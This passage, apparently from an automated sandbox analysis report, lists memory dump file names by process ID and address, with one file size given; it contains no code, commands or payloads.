                                                                                                                                                                                                                                                                          • memory/4940-291-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/5088-337-0x00000000050D0000-0x00000000056D6000-memory.dmp
                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            6.0MB

                                                                                                                                                                                                                                                                          • memory/5088-317-0x0000000000418F7A-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/5116-371-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/5140-597-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/5192-596-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/5484-497-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/5556-578-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/5680-519-0x00007FF634944060-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/5840-644-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/6068-592-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                          • memory/6104-595-0x0000000000000000-mapping.dmp